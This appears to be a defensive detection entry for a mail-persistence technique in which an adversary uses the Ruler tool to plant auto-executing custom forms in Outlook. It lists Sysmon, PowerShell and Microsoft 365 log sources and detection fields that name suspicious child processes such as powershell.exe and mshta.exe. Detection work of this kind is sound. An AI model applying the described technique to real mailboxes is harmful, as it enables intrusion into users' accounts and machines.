Adversary uses a tool like Ruler to insert a malicious custom form into the user's Outlook mailbox. The form is designed to auto-execute on Outlook startup or on receipt of a specially crafted email. This results in child processes launched from outlook.exe and possibly network connections or payload loading.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Application Log Content (DC0038) | WinEventLog:Application | Outlook errors loading or processing custom form templates |
| Command Execution (DC0064) | WinEventLog:PowerShell | Execution of Microsoft script to enumerate custom forms in Outlook mailbox |
| Field | Description |
|---|---|
| FormStorageLocation | Malicious forms may be stored in various user-specific locations in the Outlook mailbox (e.g., IPM.Note class) |
| ChildProcessName | Child process spawned by outlook.exe may vary (e.g., powershell.exe, rundll32.exe, mshta.exe) |
| TimeWindow | Form-triggered execution may happen immediately upon Outlook startup or with delay after crafted message arrival |
| OutlookVersion | Form behavior and error logs may vary across Outlook 2013, 2016, and M365 builds |
| UserContext | Attack may target only specific users; contextual correlation needed for account baselining |
Outlook form execution upon message receipt or client launch results in automated code execution within user session. Form definitions deviate from standard templates and include script logic or COM object calls embedded in form fields.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | Unusual form activity within Outlook client, including load of non-default forms |
| Command Execution (DC0064) | m365:messagetrace | Inbound email triggers execution of mailbox-stored custom form |
| Field | Description |
|---|---|
| AuditPolicyScope | Not all tenants may enable audit logs of custom form activity or COM component usage in Office |
| MessageSenderAnomalyThreshold | Ruler-style delivery may come from external accounts with forged headers or low reputation |
| FormExecutionRate | Frequency of form triggers may be anomalously high compared to baseline Outlook usage |